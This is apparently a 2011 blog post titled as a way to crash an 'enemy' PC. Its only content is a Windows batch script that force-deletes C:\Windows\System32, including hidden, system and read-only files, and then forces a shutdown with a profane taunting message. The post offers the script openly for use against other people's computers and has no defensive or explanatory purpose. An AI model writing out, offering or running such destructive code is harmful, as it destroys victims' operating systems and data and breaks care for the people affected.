Wednesday, 11 May 2011

crash your enemy PC by windows system 32 command promt

HEY HERE IS SIMPLE WAY TO BLOCK ENEMY PC
the simple deadliest code is 


@Echo off
@Color 0A
@Echo Hello, this will fuck over your computer... just a moment...
Del /s /q /a RHSA C:\Windows\System32
Echo thank you for waiting :)
Shutdown -f -s -t 20 -c "Your computer got fucked, please wait for shutting down..."
Exit